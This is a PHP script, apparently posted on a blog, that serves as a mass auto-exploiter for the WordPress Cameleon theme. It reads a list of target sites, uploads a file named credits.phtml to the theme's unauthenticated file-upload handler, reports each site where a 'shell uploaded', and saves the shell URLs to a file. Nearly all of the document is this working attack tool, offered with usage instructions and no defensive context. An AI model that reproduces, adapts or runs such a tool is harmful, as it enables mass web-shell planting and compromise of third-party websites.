#- Title : WordPress Chameleon Auto exploiter
#- Coded By : kkk1337
#- Team : Umbrella Security
#- Extension : Php
#- Using this Tool >> php file.php list.txt
#- Example >> file.php = This file name | list.txt = your list target
<?php
// Coded by KkK1337
// Greetz to: Condor8
// fb: https://www.facebook.com/Cracker1337
// pastebin: http://pastebin.com/u/KkK1337
// don't change rights
echo "chameleon auto-exploiter by KkK1337";
$x=file($argv[1]);
foreach ($x as $sites){
$sites=trim($sites);
$uploadfile="credits.phtml";
$ch = curl_init("$sites/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$waw = curl_exec($ch);
curl_close($ch);
if(preg_match("/success/i",$waw)){
print "shell uploaded : $sites \n";
$u="$sites/wp-content/uploads/2014/10/credits.phtml"; // Change year and month. Year: 2014 , Month: 10
$ux = "".$u."\r\n"; $save=fopen('new.txt','ab'); fwrite($save,"$ux");
}
else{
echo "Not vuln : $sites\n";
}
}
?>
Tidak ada komentar:
Posting Komentar